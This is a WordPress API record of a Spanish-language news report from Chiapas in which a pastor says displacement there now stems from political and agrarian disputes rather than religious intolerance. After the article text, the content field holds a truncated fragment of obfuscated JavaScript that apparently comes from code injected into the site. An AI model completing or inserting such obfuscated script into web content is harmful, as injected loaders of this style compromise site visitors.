{"id":4127,"date":"2022-08-04T04:01:22","date_gmt":"2022-08-04T04:01:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4127"},"modified":"2022-08-04T04:01:23","modified_gmt":"2022-08-04T04:01:23","slug":"motivos-de-desplazamiento-en-chiapas-han-cambiado-asegura-pastor","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4127","title":{"rendered":"Motivos de desplazamiento en Chiapas han cambiado asegura pastor"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220803-WA0073.jpg\" alt=\"\" class=\"wp-image-4128\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220803-WA0073.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220803-WA0073-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Esdras Alonzo Gonz\u00e1lez, pastor de la Iglesia Evang\u00e9lica Alas de \u00c1guila-Ej\u00e9rcito de Dios, consider\u00f3 que en lo que va del sexenio del presidente de la Rep\u00fablica y del gobierno de Chiapas, se han dado puntual atenci\u00f3n al tema de desplazamiento forzado, y en la actualidad ha dado un giro, ya que los desplazamientos son m\u00e1s por cuestiones pol\u00edticas y territoriales, y no por intolerancia religiosa. Entrevistado al respecto, consider\u00f3 que en el sexenio de Juan Sabines Guerrero, se dejaron instrumentos jur\u00eddicos, que en este sexenio se han utilizado para salvaguardar los derechos de las personas y los problemas por intolerancia religiosa se han atendido, y los casos en los que no han podido retornar, se les ha buscado espacios para iniciar una nueva vida, incluso en algunos casos se les hizo la reparaci\u00f3n del da\u00f1o. \u201cSe est\u00e1 construyendo un nuevo di\u00e1logo, hoy el escenario cambi\u00f3 con la llegada de este nuevo gobierno, el gobierno federal tiene mucho inter\u00e9s de ayudar a los grupos, se est\u00e1n dando las cosas y una perspectiva positiva de que sea el marco jur\u00eddico establecido el que pueda responder a estas necesidades sociales las que se han dado aqu\u00ed. Ahora son otros motivos, m\u00e1s bien son diferencias pol\u00edticas los m\u00f3viles, por ejemplo Pantelh\u00f3, con el problema que tiene otros tintes\u201d, dijo. La presencia de grupos internacionales de Derechos Humanos, supuso han ayudado para que los gobiernos, den la atenci\u00f3n, y por lo menos hoy hay una ley sobre los desplazamientos y el gobierno est\u00e1 escuchando a nivel Federal y estatal, \u201cnos da m\u00e1s tranquilidad\u201d. Alonzo Gonz\u00e1lez, indic\u00f3 que en el caso de Desplazados de Alas de \u00c1guila, solo es el pastor Alejandro Jim\u00e9nez y sus hijos, de Mitzit\u00f3n, pero independientemente de ese caso, la comunidad como tal, ha dejado las problem\u00e1ticas y de 6 meses atr\u00e1s, ha habido di\u00e1logos, \u201cy se apacigu\u00f3, la propia comunidad emiti\u00f3 un documento al presidente de la Rep\u00fablica, donde se especifica que ya se par\u00f3 la situaci\u00f3n, y la comunidad se ha dado cuenta, qui\u00e9nes han estado detr\u00e1s de estos desplazamientos de tiempo atr\u00e1s\u201d. \u201cSe han superado los problemas de religi\u00f3n, ahora se han dado m\u00e1s por ideolog\u00edas pol\u00edticas o de inter\u00e9s pol\u00edticos que se han confrontado, pero por problemas de tierras, agrarios, pero el tema religioso se ha superado. De 1998 a la fecha con Rutilio Escand\u00f3n, se pudo tener personas ahora que tienen conocimiento del tema, y que no est\u00e1n nada m\u00e1s por recomendaciones, los que est\u00e1n conocen del tema y eso ha ayudado much\u00edsimo y eso ayuda al gobierno, para no distorsionar la informaci\u00f3n, ha habido atenci\u00f3n a los temas de religi\u00f3n\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Esdras Alonzo Gonz\u00e1lez, pastor de la Iglesia Evang\u00e9lica Alas de \u00c1guila-Ej\u00e9rcito de Dios, consider\u00f3 que en lo que va del sexenio del presidente de la Rep\u00fablica y del gobierno de Chiapas, se han dado puntual atenci\u00f3n al tema de desplazamiento forzado, y en la actualidad ha dado un &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4127","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4127"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4127\/revisions"}],"predecessor-version":[{"id":4129,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4127\/revisions\/4129"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4128"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}